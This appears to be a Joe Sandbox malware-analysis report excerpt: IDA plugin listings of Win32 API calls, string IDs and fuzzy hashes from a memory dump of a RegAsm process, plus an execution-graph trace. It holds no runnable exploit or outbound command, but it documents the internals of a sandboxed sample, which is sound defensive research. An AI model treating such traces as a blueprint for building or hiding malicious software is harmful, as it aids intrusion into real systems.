                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _snwprintf
                                                                                                                                                                                                • String ID: %%-%d.%ds
                                                                                                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                                                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                                                                • String ID: F^@
                                                                                                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                                                                                                • String ID: WinPos
                                                                                                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                • API String ID: 4271163124-1506664499
                                                                                                                                                                                                • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                                • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                                • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                                                                • String ID: r!A
                                                                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                                                                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                                                                • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                                                                • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 726966127-0
                                                                                                                                                                                                • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 231171946-0
                                                                                                                                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3669619086-0
                                                                                                                                                                                                • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                                                • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                • free.MSVCRT ref: 00417425
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2605342592-0
                                                                                                                                                                                                • Opcode ID: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                                                                                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 298c1b78ec40d35b66389f03ec607d1e1913be90b5675ae270efcdcf604800a3
                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001A.00000002.512114401.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1961120804-0
                                                                                                                                                                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:3%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:21.8%
                                                                                                                                                                                                Signature Coverage:0.4%
                                                                                                                                                                                                Total number of Nodes:925
                                                                                                                                                                                                Total number of Limit Nodes:15
                                                                                                                                                                                                execution_graph 34241 40fc40 60 API calls 34416 403640 21 API calls 34242 427fa4 42 API calls 34417 412e43 _endthreadex 34418 425115 76 API calls __fprintf_l 34419 43fe40 133 API calls 34245 425115 83 API calls __fprintf_l 34246 401445 memcpy memcpy DialogBoxParamA 34247 440c40 34 API calls 33271 444c4a 33290 444e38 33271->33290 33273 444c56 GetModuleHandleA 33276 444c68 __set_app_type __p__fmode __p__commode 33273->33276 33275 444cfa 33277 444d02 __setusermatherr 33275->33277 33278 444d0e 33275->33278 33276->33275 33277->33278 33291 444e22 _controlfp 33278->33291 33280 444d13 _initterm __getmainargs _initterm 33281 444d6a GetStartupInfoA 33280->33281 33283 444d9e GetModuleHandleA 33281->33283 33292 40cf44 33283->33292 33287 444dcf _cexit 33289 444e04 33287->33289 33288 444dc8 exit 33288->33287 33290->33273 33291->33280 33343 404a99 LoadLibraryA 33292->33343 33294 40cf60 33295 40cf64 33294->33295 33349 410d0e 33294->33349 33295->33287 33295->33288 33297 40cf6f 33353 40ccd7 ??2@YAPAXI 33297->33353 33299 40cf9b 33367 407cbc 33299->33367 33304 40cfc4 33385 409825 memset 33304->33385 33305 40cfd8 33390 4096f4 memset 33305->33390 33310 40d181 ??3@YAXPAX 33312 40d1b3 33310->33312 33313 40d19f DeleteObject 33310->33313 33311 407e30 _strcmpi 33314 40cfee 33311->33314 33414 407948 free free 33312->33414 33313->33312 33316 40cff2 RegDeleteKeyA 33314->33316 33317 40d007 EnumResourceTypesA 33314->33317 33316->33310 33319 40d047 33317->33319 33320 40d02f MessageBoxA 33317->33320 33318 40d1c4 33415 4080d4 free 33318->33415 33321 40d0a0 CoInitialize 33319->33321 33395 40ce70 33319->33395 33320->33310 33412 40cc26 strncat memset RegisterClassA CreateWindowExA 33321->33412 33325 40d1cd 33416 407948 free free 33325->33416 33327 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33413 40c256 PostMessageA 33327->33413 33329 40d061 ??3@YAXPAX 33329->33312 33332 40d084 DeleteObject 33329->33332 33330 40d09e 33330->33321 33332->33312 33335 40d0f9 GetMessageA 33336 40d17b CoUninitialize 33335->33336 33338 40d10d 33335->33338 33336->33310 33337 40d113 TranslateAccelerator 33337->33338 33339 40d16d GetMessageA 33337->33339 33338->33337 33340 40d145 IsDialogMessage 33338->33340 33341 40d139 IsDialogMessage 33338->33341 33339->33336 33339->33337 33340->33339 33342 40d157 TranslateMessage DispatchMessageA 33340->33342 33341->33339 33341->33340 33342->33339 33344 404ae8 33343->33344 33348 404ac4 FreeLibrary 33343->33348 33346 404b13 33344->33346 33347 404afc MessageBoxA 33344->33347 33346->33294 33347->33294 33348->33344 33350 410d17 LoadLibraryA 33349->33350 33351 410d3c 33349->33351 33350->33351 33352 410d2b 33350->33352 33351->33297 33352->33351 33354 40cd08 ??2@YAPAXI 33353->33354 33356 40cd26 33354->33356 33357 40cd2d 33354->33357 33424 404025 6 API calls 33356->33424 33359 40cd66 33357->33359 33360 40cd59 DeleteObject 33357->33360 33417 407088 33359->33417 33360->33359 33362 40cd6b 33420 4019b5 33362->33420 33365 4019b5 strncat 33366 40cdbf _mbscpy 33365->33366 33366->33299 33426 407948 free free 33367->33426 33370 407cf7 33372 407a1f malloc memcpy free free 33370->33372 33373 407ddc 33370->33373 33375 407d7a free 33370->33375 33380 407e04 33370->33380 33427 40796e strlen 33370->33427 33440 406f30 33370->33440 33372->33370 33373->33380 33448 407a1f 33373->33448 33375->33370 33379 40796e 7 API calls 33379->33380 33437 407a55 33380->33437 33381 407e30 33382 407e38 33381->33382 33384 407e57 33381->33384 33383 407e41 _strcmpi 33382->33383 33382->33384 33383->33382 33383->33384 33384->33304 33384->33305 33453 4097ff 33385->33453 33387 409854 33458 409731 33387->33458 33391 4097ff 3 API calls 33390->33391 33392 409723 33391->33392 33478 40966c GetFileAttributesA GetPrivateProfileStringA _mbscpy _mbscpy GetPrivateProfileIntA 33392->33478 33394 40972b 33394->33311 33479 4023b2 33395->33479 33400 40ced3 33569 40cdda 7 API calls 33400->33569 33401 40cece 33405 40cf3f 33401->33405 33520 40c3d0 memset GetModuleFileNameA strrchr 33401->33520 33405->33329 33405->33330 33408 40ceed 33548 40affa 33408->33548 33412->33327 33413->33335 33414->33318 33415->33325 33416->33295 33425 406fc7 memset _mbscpy 33417->33425 33419 40709f CreateFontIndirectA 33419->33362 33421 4019e1 33420->33421 33422 4019c2 strncat 33421->33422 33423 4019e5 memset LoadIconA 33421->33423 33422->33421 33423->33365 33424->33357 33425->33419 33426->33370 33428 4079a1 33427->33428 33429 407998 free 33427->33429 33431 406f30 3 API calls 33428->33431 33430 4079ab 33429->33430 33432 4079c4 33430->33432 33433 4079bb free 33430->33433 33431->33430 33435 406f30 3 API calls 33432->33435 33434 4079d0 memcpy 33433->33434 33434->33370 33436 4079cf 33435->33436 33436->33434 33438 407a65 33437->33438 33439 407a5b free 33437->33439 33438->33381 33439->33438 33441 406f37 malloc 33440->33441 33442 406f7d 33440->33442 33444 406f73 33441->33444 33445 406f58 33441->33445 33442->33370 33444->33370 33446 406f6c free 33445->33446 33447 406f5c memcpy 33445->33447 33446->33444 33447->33446 33449 407a38 33448->33449 33450 407a2d free 33448->33450 33451 406f30 3 API calls 33449->33451 33452 407a43 33450->33452 33451->33452 33452->33379 33469 406f96 GetModuleFileNameA 33453->33469 33455 409805 strrchr 33456 409814 33455->33456 33457 409817 _mbscat 33455->33457 33456->33457 33457->33387 33470 44b090 33458->33470 33460 40973e _mbscpy _mbscpy 33472 40930c 33460->33472 33463 40930c 3 API calls 33464 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33463->33464 33465 4097c5 LoadStringA 33464->33465 33466 4097db 33465->33466 33466->33465 33468 4097f3 33466->33468 33477 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33466->33477 33468->33310 33469->33455 33471 44b097 33470->33471 33471->33460 33471->33471 33473 44b090 33472->33473 33474 409319 memset GetPrivateProfileStringA 33473->33474 33475 409374 33474->33475 33476 409364 WritePrivateProfileStringA 33474->33476 33475->33463 33476->33475 33477->33466 33478->33394 33571 409c1c 33479->33571 33482 401e69 memset 33610 410dbb 33482->33610 33485 401ec2 33641 4070e3 strlen _mbscat _mbscpy _mbscat 33485->33641 33486 401ed4 33626 406f81 GetFileAttributesA 33486->33626 33489 401ee6 strlen strlen 33491 401f15 33489->33491 33492 401f28 33489->33492 33642 4070e3 strlen _mbscat _mbscpy _mbscat 33491->33642 33627 406f81 GetFileAttributesA 33492->33627 33495 401f35 33628 401c31 33495->33628 33498 401f75 33640 410a9c RegOpenKeyExA 33498->33640 33499 401c31 7 API calls 33499->33498 33501 401f91 33502 402187 33501->33502 33503 401f9c memset 33501->33503 33505 402195 ExpandEnvironmentStringsA 33502->33505 33506 4021a8 _strcmpi 33502->33506 33643 410b62 RegEnumKeyExA 33503->33643 33652 406f81 GetFileAttributesA 33505->33652 33506->33400 33506->33401 33508 40217e RegCloseKey 33508->33502 33509 401fd9 atoi 33510 401fef memset memset sprintf 33509->33510 33513 401fc9 33509->33513 33644 410b1e 33510->33644 33513->33508 33513->33509 33514 402165 33513->33514 33515 402076 memset memset strlen strlen 33513->33515 33516 4070e3 strlen _mbscat _mbscpy _mbscat 33513->33516 33517 4020dd strlen strlen 33513->33517 33518 406f81 GetFileAttributesA 33513->33518 33519 402167 _mbscpy 33513->33519 33651 410b62 RegEnumKeyExA 33513->33651 33514->33508 33515->33513 33516->33513 33517->33513 33518->33513 33519->33508 33521 40c422 33520->33521 33522 40c425 _mbscat _mbscpy _mbscpy 33520->33522 33521->33522 33523 40c49d 33522->33523 33524 40c502 GetWindowPlacement 33523->33524 33525 40c512 33523->33525 33524->33525 33526 40c538 33525->33526 33673 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33525->33673 33666 409b31 33526->33666 33530 40ba28 33531 40ba87 33530->33531 33537 40ba3c 33530->33537 33676 406c62 LoadCursorA SetCursor 33531->33676 33533 40ba43 _mbsicmp 33533->33537 33534 40ba8c 33677 410a9c RegOpenKeyExA 33534->33677 33678 4107f1 33534->33678 33681 410808 33534->33681 